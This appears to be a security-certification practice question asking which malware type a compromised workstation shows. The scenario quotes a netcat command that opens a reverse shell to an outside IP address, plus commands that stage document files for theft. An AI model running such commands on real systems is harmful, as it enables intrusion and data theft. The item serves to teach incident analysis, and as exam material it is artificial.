Question No. 1
A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious.
One of the files contains the following commands:
cmd /C %TEMP%\nc -e cmd.exe 188.8.131.52
copy *.doc > %TEMP%\docfiles.zip
copy *.xls > %TEMP%\xlsfiles.zip
copy *.pdf > %TEMP%\pdffiles.zip
Which of the following types of malware was used?
Choose the correct option from the given list.
01 / 715